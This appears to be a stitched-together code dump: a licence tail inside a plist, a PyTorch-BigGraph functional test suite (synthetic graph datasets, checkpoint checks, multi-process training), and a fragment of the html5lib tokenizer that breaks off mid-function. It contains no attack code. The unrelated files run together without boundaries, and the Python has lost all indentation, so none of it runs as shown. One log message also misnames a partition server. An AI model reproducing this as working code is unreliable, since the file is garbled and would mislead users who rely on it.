THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/</string>
</dict>
</plist>
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE.txt file in the root directory of this source tree.
import json
import logging
import os.path
import random
import time
import unittest
from functools import partial
from tempfile import TemporaryDirectory
from typing import Dict, Iterable, List, Mapping, NamedTuple, Tuple, Union
from unittest import TestCase, main
import attr
import h5py
import numpy as np
import torch
import torch.multiprocessing as mp
from torchbiggraph.config import ConfigSchema, EntitySchema, RelationSchema
from torchbiggraph.eval import do_eval
from torchbiggraph.partitionserver import run_partition_server
from torchbiggraph.stats import SerializedStats
from torchbiggraph.train import train
from torchbiggraph.train_gpu import CPP_INSTALLED
from torchbiggraph.util import (
SubprocessInitializer,
call_one_after_the_other,
setup_logging,
)
logger = logging.getLogger("torchbiggraph")
class Dataset(NamedTuple):
entity_path: TemporaryDirectory
relation_paths: List[TemporaryDirectory]
def cleanup(self):
self.entity_path.cleanup()
for path in self.relation_paths:
path.cleanup()
def broadcast_nums(nums: Iterable[int]) -> int:
    """Return the single value in `nums` that differs from 1, or 1 if there is none."""
different_nums = set(nums) - {1}
if len(different_nums) > 1:
raise RuntimeError("%s cannot be broadcast to a single value" % nums)
return different_nums.pop() if different_nums else 1
def generate_dataset(
config: ConfigSchema, num_entities: int, fractions: List[float]
) -> Dataset:
"""Create a randomly-generated dataset compatible with the given config.
Create embeddings for each entity (generating the same given number of
entities for each type) and produce an edge between them if their dot
product is positive. The edges are split up into several sets, each one
containing a fraction of the total, as given in the argument (the fractions
can sum to less than 1, in which case the leftover edges are discarded).
"""
entity_path = TemporaryDirectory()
relation_paths = [TemporaryDirectory() for _ in fractions]
embeddings: Dict[str, Tuple[np.ndarray]] = {}
for entity_name, entity in config.entities.items():
embeddings[entity_name] = np.split(
np.random.randn(num_entities, config.dimension),
np.cumsum(
np.random.multinomial(
num_entities, [1 / entity.num_partitions] * entity.num_partitions
)[:-1]
),
)
for partition, embedding in enumerate(embeddings[entity_name]):
with open(
os.path.join(
entity_path.name,
"entity_count_%s_%d.txt" % (entity_name, partition),
),
"xt",
) as tf:
tf.write("%d" % len(embedding))
any_lhs_featurized = any(
config.entities[relation.lhs].featurized for relation in config.relations
)
any_rhs_featurized = any(
config.entities[relation.rhs].featurized for relation in config.relations
)
num_lhs_partitions = broadcast_nums(
len(embeddings[relation.lhs]) for relation in config.relations
)
num_rhs_partitions = broadcast_nums(
len(embeddings[relation.rhs]) for relation in config.relations
)
for lhs_partition in range(num_lhs_partitions):
for rhs_partition in range(num_rhs_partitions):
dtype = [
("lhs", np.int64),
("lhs_feat", np.bool_),
("rhs", np.int64),
("rhs_feat", np.bool_),
("rel", np.int64),
]
edges = np.empty((0,), dtype=dtype)
for rel_idx, relation in enumerate(config.relations):
lhs_partitioned = config.entities[relation.lhs].num_partitions > 1
rhs_partitioned = config.entities[relation.rhs].num_partitions > 1
lhs_embs = embeddings[relation.lhs][
lhs_partition if lhs_partitioned else 0
]
rhs_embs = embeddings[relation.rhs][
rhs_partition if rhs_partitioned else 0
]
scores = np.einsum("ld,rd->lr", lhs_embs, rhs_embs)
num_these_edges = np.count_nonzero(scores > 0)
these_edges = np.empty(num_these_edges, dtype=dtype)
these_edges["lhs"], these_edges["rhs"] = np.nonzero(scores > 0)
these_edges["rel"] = rel_idx
these_edges["lhs_feat"] = config.entities[relation.lhs].featurized
these_edges["rhs_feat"] = config.entities[relation.rhs].featurized
edges = np.append(edges, these_edges)
edges = edges[np.random.permutation(len(edges))]
start_idx = 0
for fraction, path in zip(fractions, relation_paths):
end_idx = start_idx + int(fraction * len(edges))
with h5py.File(
os.path.join(
path.name, "edges_%d_%d.h5" % (lhs_partition, rhs_partition)
),
"x",
) as hf:
hf.attrs["format_version"] = 1
these_edges = edges[start_idx:end_idx]
if any_lhs_featurized:
hf["lhsd_data"] = these_edges["lhs"][these_edges["lhs_feat"]]
hf["lhsd_offsets"] = np.concatenate(
(
np.array([0], dtype=np.int64),
np.cumsum(these_edges["lhs_feat"], dtype=np.int64),
)
)
# Poison the non-featurized data.
these_edges["lhs"][these_edges["lhs_feat"]] = -1
if any_rhs_featurized:
hf["rhsd_data"] = these_edges["rhs"][these_edges["rhs_feat"]]
hf["rhsd_offsets"] = np.concatenate(
(
np.array([0], dtype=np.int64),
np.cumsum(these_edges["rhs_feat"], dtype=np.int64),
)
)
# Poison the non-featurized data.
these_edges["rhs"][these_edges["rhs_feat"]] = -1
hf["lhs"] = these_edges["lhs"]
hf["rhs"] = these_edges["rhs"]
hf["rel"] = these_edges["rel"]
start_idx = end_idx
return Dataset(entity_path, relation_paths)
def init_embeddings(target: str, config: ConfigSchema, *, version: int = 0):
with open(os.path.join(target, "checkpoint_version.txt"), "xt") as tf:
tf.write("%d" % version)
for entity_name, entity in config.entities.items():
for partition in range(entity.num_partitions):
with open(
os.path.join(
config.entity_path,
"entity_count_%s_%d.txt" % (entity_name, partition),
),
"rt",
) as tf:
entity_count = int(tf.read().strip())
with h5py.File(
os.path.join(
target,
"embeddings_%s_%d.v%d.h5" % (entity_name, partition, version),
),
"x",
) as hf:
hf.attrs["format_version"] = 1
hf.create_dataset(
"embeddings",
data=np.random.randn(
entity_count, config.entity_dimension(entity_name)
),
)
with h5py.File(os.path.join(target, "model.v%d.h5" % version), "x") as hf:
hf.attrs["format_version"] = 1
class TestFunctional(TestCase):
def setUp(self) -> None:
self.subprocess_init = SubprocessInitializer()
self.subprocess_init.register(setup_logging, 1)
self.subprocess_init()
self.checkpoint_path = TemporaryDirectory()
self.addCleanup(self.checkpoint_path.cleanup)
seed = random.getrandbits(32)
np.random.seed(seed)
logger.info(f"Random seed: {seed}")
def assertHasMetadata(self, hf: h5py.File, config: ConfigSchema) -> None:
self.assertEqual(hf.attrs["format_version"], 1)
self.assertEqual(json.loads(hf.attrs["config/json"]), config.to_dict())
self.assertCountEqual(
[
key.partition("/")[-1]
for key in hf.attrs.keys()
if key.startswith("iteration/")
],
[
"num_epochs",
"epoch_idx",
"num_edge_paths",
"edge_path_idx",
"edge_path",
"num_edge_chunks",
"edge_chunk_idx",
],
)
def assertIsModelParameter(self, dataset: h5py.Dataset) -> None:
# In fact it could also be a group...
if not isinstance(dataset, h5py.Dataset):
return
self.assertIn("state_dict_key", dataset.attrs)
self.assertTrue(np.isfinite(dataset[...]).all())
def assertIsModelParameters(self, group: h5py.Group) -> None:
self.assertIsInstance(group, h5py.Group)
group.visititems(lambda _, d: self.assertIsModelParameter(d))
def assertIsOptimStateDict(self, dataset: h5py.Dataset) -> None:
self.assertIsInstance(dataset, h5py.Dataset)
self.assertEqual(dataset.dtype, np.dtype("V1"))
self.assertEqual(len(dataset.shape), 1)
def assertIsEmbeddings(
self, dataset: h5py.Dataset, entity_count: int, dimension: int
) -> None:
self.assertIsInstance(dataset, h5py.Dataset)
self.assertEqual(dataset.dtype, np.float32)
self.assertEqual(dataset.shape, (entity_count, dimension))
self.assertTrue(np.all(np.isfinite(dataset[...])))
self.assertTrue(np.all(np.linalg.norm(dataset[...], axis=-1) != 0))
def assertIsStatsDict(
self, stats: Mapping[str, Union[int, SerializedStats]]
) -> None:
self.assertIsInstance(stats, dict)
self.assertIn("index", stats)
for k, v in stats.items():
if k in (
"epoch_idx",
"edge_path_idx",
"edge_chunk_idx",
"lhs_partition",
"rhs_partition",
"index",
):
self.assertIsInstance(v, int)
elif k in (
"stats",
"eval_stats_before",
"eval_stats_after",
"eval_stats_chunk_avg",
):
self.assertIsInstance(v, dict)
assert isinstance(v, dict)
self.assertCountEqual(v.keys(), ["count", "metrics"])
self.assertIsInstance(v["count"], int)
metrics = v["metrics"]
self.assertIsInstance(metrics, dict)
assert isinstance(metrics, dict)
for m in metrics.values():
self.assertIsInstance(m, float)
else:
self.fail(f"Unknown stats key: {k}")
def assertCheckpointWritten(self, config: ConfigSchema, *, version: int) -> None:
with open(
os.path.join(config.checkpoint_path, "checkpoint_version.txt"), "rt"
) as tf:
self.assertEqual(version, int(tf.read().strip()))
with open(os.path.join(config.checkpoint_path, "config.json"), "rt") as tf:
self.assertEqual(json.load(tf), config.to_dict())
with h5py.File(
os.path.join(config.checkpoint_path, "model.v%d.h5" % version), "r"
) as hf:
self.assertHasMetadata(hf, config)
self.assertIsModelParameters(hf["model"])
self.assertIsOptimStateDict(hf["optimizer/state_dict"])
with open(
os.path.join(config.checkpoint_path, "training_stats.json"), "rt"
) as tf:
for line in tf:
self.assertIsStatsDict(json.loads(line))
for entity_name, entity in config.entities.items():
for partition in range(entity.num_partitions):
with open(
os.path.join(
config.entity_path,
"entity_count_%s_%d.txt" % (entity_name, partition),
),
"rt",
) as tf:
entity_count = int(tf.read().strip())
with h5py.File(
os.path.join(
config.checkpoint_path,
"embeddings_%s_%d.v%d.h5" % (entity_name, partition, version),
),
"r",
) as hf:
self.assertHasMetadata(hf, config)
self.assertIsEmbeddings(
hf["embeddings"],
entity_count,
config.entity_dimension(entity_name),
)
self.assertIsOptimStateDict(hf["optimizer/state_dict"])
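    # Taken together, the assertions above encode the expected checkpoint
    # layout: checkpoint_version.txt, config.json, model.v<N>.h5 (model
    # parameters plus a serialized optimizer state dict), training_stats.json
    # with one JSON stats dict per line, and one
    # embeddings_<entity>_<partition>.v<N>.h5 file per entity partition, each
    # carrying the iteration metadata attrs.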
def test_default(self):
entity_name = "e"
relation_config = RelationSchema(name="r", lhs=entity_name, rhs=entity_name)
base_config = ConfigSchema(
dimension=10,
relations=[relation_config],
entities={entity_name: EntitySchema(num_partitions=1)},
regularization_coef=1e-4,
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
workers=2,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4, 0.2])
self.addCleanup(dataset.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
)
eval_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[1].name],
relations=[attr.evolve(relation_config, all_negs=True)],
)
# Just make sure no exceptions are raised and nothing crashes.
train(train_config, rank=0, subprocess_init=self.subprocess_init)
self.assertCheckpointWritten(train_config, version=1)
do_eval(eval_config, subprocess_init=self.subprocess_init)
def test_resume_from_checkpoint(self):
entity_name = "e"
relation_config = RelationSchema(name="r", lhs=entity_name, rhs=entity_name)
base_config = ConfigSchema(
dimension=10,
relations=[relation_config],
entities={entity_name: EntitySchema(num_partitions=1)},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
num_epochs=2,
num_edge_chunks=2,
workers=2,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4, 0.4])
self.addCleanup(dataset.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[d.name for d in dataset.relation_paths],
)
# Just make sure no exceptions are raised and nothing crashes.
init_embeddings(train_config.checkpoint_path, train_config, version=7)
train(train_config, rank=0, subprocess_init=self.subprocess_init)
self.assertCheckpointWritten(train_config, version=8)
# Check we did resume the run, not start the whole thing anew.
self.assertFalse(
os.path.exists(os.path.join(train_config.checkpoint_path, "model.v6.h5"))
)
def test_with_initial_value(self):
entity_name = "e"
relation_config = RelationSchema(name="r", lhs=entity_name, rhs=entity_name)
base_config = ConfigSchema(
dimension=10,
relations=[relation_config],
entities={entity_name: EntitySchema(num_partitions=1)},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
workers=2,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4])
self.addCleanup(dataset.cleanup)
init_dir = TemporaryDirectory()
self.addCleanup(init_dir.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
init_path=init_dir.name,
)
# Just make sure no exceptions are raised and nothing crashes.
init_embeddings(train_config.init_path, train_config)
train(train_config, rank=0, subprocess_init=self.subprocess_init)
self.assertCheckpointWritten(train_config, version=1)
def test_featurized(self):
e1 = EntitySchema(num_partitions=1, featurized=True)
e2 = EntitySchema(num_partitions=1)
r1 = RelationSchema(name="r1", lhs="e1", rhs="e2")
r2 = RelationSchema(name="r2", lhs="e2", rhs="e1")
base_config = ConfigSchema(
dimension=10,
relations=[r1, r2],
entities={"e1": e1, "e2": e2},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
workers=2,
regularization_coef=1e-4,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4, 0.2])
self.addCleanup(dataset.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
)
eval_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[1].name],
)
# Just make sure no exceptions are raised and nothing crashes.
train(train_config, rank=0, subprocess_init=self.subprocess_init)
self.assertCheckpointWritten(train_config, version=1)
do_eval(eval_config, subprocess_init=self.subprocess_init)
def test_partitioned(self):
e1 = EntitySchema(num_partitions=1)
e2 = EntitySchema(num_partitions=2)
e3 = EntitySchema(num_partitions=3)
r1 = RelationSchema(name="r1", lhs="e1", rhs="e3")
r2 = RelationSchema(name="r2", lhs="e2", rhs="e3")
r3 = RelationSchema(name="r3", lhs="e2", rhs="e1")
base_config = ConfigSchema(
dimension=10,
relations=[r1, r2, r3],
entities={"e1": e1, "e2": e2, "e3": e3},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
workers=2,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4, 0.2])
self.addCleanup(dataset.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
)
eval_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[1].name],
)
# Just make sure no exceptions are raised and nothing crashes.
train(train_config, rank=0, subprocess_init=self.subprocess_init)
self.assertCheckpointWritten(train_config, version=1)
do_eval(eval_config, subprocess_init=self.subprocess_init)
@unittest.skipIf(not torch.cuda.is_available() or not CPP_INSTALLED, "No GPU")
def test_gpu(self):
self._test_gpu()
@unittest.skipIf(not torch.cuda.is_available() or not CPP_INSTALLED, "No GPU")
def test_gpu_half(self):
self._test_gpu(do_half_precision=True)
@unittest.skipIf(not torch.cuda.is_available() or not CPP_INSTALLED, "No GPU")
def test_gpu_1partition(self):
self._test_gpu(num_partitions=1)
def _test_gpu(self, do_half_precision=False, num_partitions=2):
entity_name = "e"
relation_config = RelationSchema(name="r", lhs=entity_name, rhs=entity_name)
base_config = ConfigSchema(
dimension=16,
batch_size=1024,
num_batch_negs=64,
num_uniform_negs=64,
relations=[relation_config],
entities={entity_name: EntitySchema(num_partitions=num_partitions)},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
workers=2,
num_gpus=2,
regularization_coef=1e-4,
half_precision=do_half_precision,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4, 0.2])
self.addCleanup(dataset.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
)
eval_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[1].name],
relations=[attr.evolve(relation_config, all_negs=True)],
)
# Just make sure no exceptions are raised and nothing crashes.
train(train_config, rank=0, subprocess_init=self.subprocess_init)
self.assertCheckpointWritten(train_config, version=1)
do_eval(eval_config, subprocess_init=self.subprocess_init)
def _test_distributed(self, num_partitions):
sync_path = TemporaryDirectory()
self.addCleanup(sync_path.cleanup)
e1 = "e1"
e2 = "e2"
relation_config = RelationSchema(
name="r",
lhs=e1,
rhs=e2,
operator="linear", # To exercise the parameter server.
)
base_config = ConfigSchema(
dimension=10,
relations=[relation_config],
entities={
e1: EntitySchema(num_partitions=num_partitions),
e2: EntitySchema(num_partitions=4),
},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
num_machines=2,
distributed_init_method="file://%s" % os.path.join(sync_path.name, "sync"),
workers=2,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4])
self.addCleanup(dataset.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
)
# Just make sure no exceptions are raised and nothing crashes.
trainer0 = mp.get_context("spawn").Process(
name="Trainer-0",
target=partial(
call_one_after_the_other,
self.subprocess_init,
partial(
train, train_config, rank=0, subprocess_init=self.subprocess_init
),
),
)
trainer1 = mp.get_context("spawn").Process(
name="Trainer-1",
target=partial(
call_one_after_the_other,
self.subprocess_init,
partial(
train, train_config, rank=1, subprocess_init=self.subprocess_init
),
),
)
# FIXME In Python 3.7 use kill here.
self.addCleanup(trainer0.terminate)
self.addCleanup(trainer1.terminate)
trainer0.start()
trainer1.start()
done = [False, False]
while not all(done):
time.sleep(1)
if not trainer0.is_alive() and not done[0]:
self.assertEqual(trainer0.exitcode, 0)
done[0] = True
if not trainer1.is_alive() and not done[1]:
self.assertEqual(trainer1.exitcode, 0)
done[1] = True
self.assertCheckpointWritten(train_config, version=1)
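    # The trainers are polled with is_alive() rather than join() so each exit
    # code is asserted as soon as that process finishes; terminate() is only
    # registered as a cleanup fallback (kill() would be preferable but needs
    # Python 3.7, per the FIXME above).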
def test_distributed(self):
self._test_distributed(num_partitions=4)
def test_distributed_unpartitioned(self):
self._test_distributed(num_partitions=1)
def test_distributed_with_partition_servers(self):
sync_path = TemporaryDirectory()
self.addCleanup(sync_path.cleanup)
entity_name = "e"
relation_config = RelationSchema(name="r", lhs=entity_name, rhs=entity_name)
base_config = ConfigSchema(
dimension=10,
relations=[relation_config],
entities={entity_name: EntitySchema(num_partitions=4)},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
num_machines=2,
num_partition_servers=2,
distributed_init_method="file://%s" % os.path.join(sync_path.name, "sync"),
workers=2,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4])
self.addCleanup(dataset.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
)
# Just make sure no exceptions are raised and nothing crashes.
trainer0 = mp.get_context("spawn").Process(
name="Trainer-0",
target=partial(
call_one_after_the_other,
self.subprocess_init,
partial(
train, train_config, rank=0, subprocess_init=self.subprocess_init
),
),
)
trainer1 = mp.get_context("spawn").Process(
name="Trainer-1",
target=partial(
call_one_after_the_other,
self.subprocess_init,
partial(
train, train_config, rank=1, subprocess_init=self.subprocess_init
),
),
)
partition_server0 = mp.get_context("spawn").Process(
name="PartitionServer-0",
target=partial(
call_one_after_the_other,
self.subprocess_init,
partial(
run_partition_server,
train_config,
rank=0,
subprocess_init=self.subprocess_init,
),
),
)
partition_server1 = mp.get_context("spawn").Process(
name="PartitionServer-1",
target=partial(
call_one_after_the_other,
self.subprocess_init,
partial(
run_partition_server,
train_config,
rank=1,
subprocess_init=self.subprocess_init,
),
),
)
# FIXME In Python 3.7 use kill here.
self.addCleanup(trainer0.terminate)
self.addCleanup(trainer1.terminate)
self.addCleanup(partition_server0.terminate)
self.addCleanup(partition_server1.terminate)
trainer0.start()
trainer1.start()
partition_server0.start()
partition_server1.start()
done = [False, False]
while not all(done):
time.sleep(1)
if not trainer0.is_alive() and not done[0]:
self.assertEqual(trainer0.exitcode, 0)
done[0] = True
if not trainer1.is_alive() and not done[1]:
self.assertEqual(trainer1.exitcode, 0)
done[1] = True
partition_server0.join()
partition_server1.join()
logger.info(
f"Partition server 0 died with exit code {partition_server0.exitcode}"
)
logger.info(
f"Partition server 0 died with exit code {partition_server1.exitcode}"
)
self.assertCheckpointWritten(train_config, version=1)
def test_dynamic_relations(self):
relation_config = RelationSchema(name="r", lhs="el", rhs="er")
base_config = ConfigSchema(
dimension=10,
relations=[relation_config],
entities={
"el": EntitySchema(num_partitions=1),
"er": EntitySchema(num_partitions=1),
},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
dynamic_relations=True,
global_emb=False, # Must be off for dynamic relations.
workers=2,
)
gen_config = attr.evolve(
base_config,
relations=[relation_config] * 10,
dynamic_relations=False, # Must be off if more than 1 relation.
)
dataset = generate_dataset(gen_config, num_entities=100, fractions=[0.04, 0.02])
self.addCleanup(dataset.cleanup)
with open(
os.path.join(dataset.entity_path.name, "dynamic_rel_count.txt"), "xt"
) as f:
f.write("%d" % len(gen_config.relations))
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
)
eval_config = attr.evolve(
base_config,
relations=[attr.evolve(relation_config, all_negs=True)],
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[1].name],
)
# Just make sure no exceptions are raised and nothing crashes.
train(train_config, rank=0, subprocess_init=self.subprocess_init)
self.assertCheckpointWritten(train_config, version=1)
do_eval(eval_config, subprocess_init=self.subprocess_init)
def test_entity_dimensions(self):
entity_name = "e"
relation_config = RelationSchema(name="r", lhs=entity_name, rhs=entity_name)
base_config = ConfigSchema(
dimension=10,
relations=[relation_config],
entities={entity_name: EntitySchema(num_partitions=1, dimension=8)},
entity_path=None, # filled in later
edge_paths=[], # filled in later
checkpoint_path=self.checkpoint_path.name,
workers=2,
)
dataset = generate_dataset(base_config, num_entities=100, fractions=[0.4, 0.2])
self.addCleanup(dataset.cleanup)
train_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[0].name],
)
eval_config = attr.evolve(
base_config,
entity_path=dataset.entity_path.name,
edge_paths=[dataset.relation_paths[1].name],
relations=[attr.evolve(relation_config, all_negs=True)],
)
# Just make sure no exceptions are raised and nothing crashes.
train(train_config, rank=0, subprocess_init=self.subprocess_init)
self.assertCheckpointWritten(train_config, version=1)
do_eval(eval_config, subprocess_init=self.subprocess_init)
if __name__ == "__main__":
main()
from __future__ import absolute_import, division, unicode_literals
from six import unichr as chr
from collections import deque, OrderedDict
from sys import version_info
from .constants import spaceCharacters
from .constants import entities
from .constants import asciiLetters, asciiUpper2Lower
from .constants import digits, hexDigits, EOF
from .constants import tokenTypes, tagTokenTypes
from .constants import replacementCharacters
from ._inputstream import HTMLInputStream
from ._trie import Trie
entitiesTrie = Trie(entities)
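# The trie over entity names is what makes longest-match lookup cheap in
# consumeEntity below: has_keys_with_prefix() bounds how far ahead to read and
# longest_prefix() picks the winning entity. Illustrative example: for the
# input "&notit;" the longest matching name is "not", so "&not" is consumed
# (yielding U+00AC) and "it;" is left to be emitted as ordinary characters.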
if version_info >= (3, 7):
attributeMap = dict
else:
attributeMap = OrderedDict
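# From Python 3.7 the built-in dict preserves insertion order, so OrderedDict
# is only needed as the attribute map on older interpreters.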
class HTMLTokenizer(object):
""" This class takes care of tokenizing HTML.
* self.currentToken
Holds the token that is currently being processed.
* self.state
Holds a reference to the method to be invoked... XXX
* self.stream
      Points to the HTMLInputStream object.
"""
def __init__(self, stream, parser=None, **kwargs):
self.stream = HTMLInputStream(stream, **kwargs)
self.parser = parser
# Setup the initial tokenizer state
self.escapeFlag = False
self.lastFourChars = []
self.state = self.dataState
self.escape = False
# The current token being created
self.currentToken = None
super(HTMLTokenizer, self).__init__()
def __iter__(self):
""" This is where the magic happens.
        We do our usual processing through the states and when we have a token
        to return we yield the token, which pauses processing until the next
        token is requested.
"""
self.tokenQueue = deque([])
# Start processing. When EOF is reached self.state will return False
# instead of True and the loop will terminate.
while self.state():
while self.stream.errors:
yield {"type": tokenTypes["ParseError"], "data": self.stream.errors.pop(0)}
while self.tokenQueue:
yield self.tokenQueue.popleft()
def consumeNumberEntity(self, isHex):
"""This function returns either U+FFFD or the character based on the
decimal or hexadecimal representation. It also discards ";" if present.
If not present self.tokenQueue.append({"type": tokenTypes["ParseError"]}) is invoked.
"""
allowed = digits
radix = 10
if isHex:
allowed = hexDigits
radix = 16
charStack = []
# Consume all the characters that are in range while making sure we
# don't hit an EOF.
c = self.stream.char()
while c in allowed and c is not EOF:
charStack.append(c)
c = self.stream.char()
# Convert the set of characters consumed to an int.
charAsInt = int("".join(charStack), radix)
# Certain characters get replaced with others
if charAsInt in replacementCharacters:
char = replacementCharacters[charAsInt]
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"illegal-codepoint-for-numeric-entity",
"datavars": {"charAsInt": charAsInt}})
elif ((0xD800 <= charAsInt <= 0xDFFF) or
(charAsInt > 0x10FFFF)):
char = "\uFFFD"
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"illegal-codepoint-for-numeric-entity",
"datavars": {"charAsInt": charAsInt}})
else:
# Should speed up this check somehow (e.g. move the set to a constant)
if ((0x0001 <= charAsInt <= 0x0008) or
(0x000E <= charAsInt <= 0x001F) or
(0x007F <= charAsInt <= 0x009F) or
(0xFDD0 <= charAsInt <= 0xFDEF) or
charAsInt in frozenset([0x000B, 0xFFFE, 0xFFFF, 0x1FFFE,
0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE,
0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE,
0x5FFFF, 0x6FFFE, 0x6FFFF, 0x7FFFE,
0x7FFFF, 0x8FFFE, 0x8FFFF, 0x9FFFE,
0x9FFFF, 0xAFFFE, 0xAFFFF, 0xBFFFE,
0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE,
0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE,
0xFFFFF, 0x10FFFE, 0x10FFFF])):
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data":
"illegal-codepoint-for-numeric-entity",
"datavars": {"charAsInt": charAsInt}})
try:
                # Try/except needed as UCS-2 Python builds' unichr only works
                # within the BMP.
char = chr(charAsInt)
except ValueError:
v = charAsInt - 0x10000
char = chr(0xD800 | (v >> 10)) + chr(0xDC00 | (v & 0x3FF))
        # Discard the ";" if present. Otherwise, queue a
        # "numeric-entity-without-semicolon" ParseError and unget the character.
if c != ";":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"numeric-entity-without-semicolon"})
self.stream.unget(c)
return char
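    # Worked example (illustrative): for the input "&#x41;", consumeEntity
    # below sees "#" then "x" and calls consumeNumberEntity(True), which reads
    # "41", computes charAsInt == 0x41 and returns "A", consuming the ";".
    # Without the ";" the same character is returned, but a
    # "numeric-entity-without-semicolon" ParseError is queued first.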
def consumeEntity(self, allowedChar=None, fromAttribute=False):
# Initialise to the default output for when no entity is matched
output = "&"
charStack = [self.stream.char()]
if (charStack[0] in spaceCharacters or charStack[0] in (EOF, "<", "&") or
(allowedChar is not None and allowedChar == charStack[0])):
self.stream.unget(charStack[0])
elif charStack[0] == "#":
# Read the next character to see if it's hex or decimal
hex = False
charStack.append(self.stream.char())
if charStack[-1] in ("x", "X"):
hex = True
charStack.append(self.stream.char())
# charStack[-1] should be the first digit
if (hex and charStack[-1] in hexDigits) \
or (not hex and charStack[-1] in digits):
# At least one digit found, so consume the whole number
self.stream.unget(charStack[-1])
output = self.consumeNumberEntity(hex)
else:
# No digits found
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "expected-numeric-entity"})
self.stream.unget(charStack.pop())
output = "&" + "".join(charStack)
else:
            # At this point in the process we might have a named entity.
            # Entities are stored in the global variable "entities".
            #
            # Consume characters and compare them to a substring of the
            # entity names in the list until the substring no longer matches.
while (charStack[-1] is not EOF):
if not entitiesTrie.has_keys_with_prefix("".join(charStack)):
break
charStack.append(self.stream.char())
# At this point we have a string that starts with some characters
# that may match an entity
# Try to find the longest entity the string will match to take care
            # of &noti for instance.
try:
entityName = entitiesTrie.longest_prefix("".join(charStack[:-1]))
entityLength = len(entityName)
except KeyError:
entityName = None
if entityName is not None:
if entityName[-1] != ";":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"named-entity-without-semicolon"})
if (entityName[-1] != ";" and fromAttribute and
(charStack[entityLength] in asciiLetters or
charStack[entityLength] in digits or
charStack[entityLength] == "=")):
self.stream.unget(charStack.pop())
output = "&" + "".join(charStack)
else:
output = entities[entityName]
self.stream.unget(charStack.pop())
output += "".join(charStack[entityLength:])
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-named-entity"})
self.stream.unget(charStack.pop())
output = "&" + "".join(charStack)
if fromAttribute:
self.currentToken["data"][-1][1] += output
else:
if output in spaceCharacters:
tokenType = "SpaceCharacters"
else:
tokenType = "Characters"
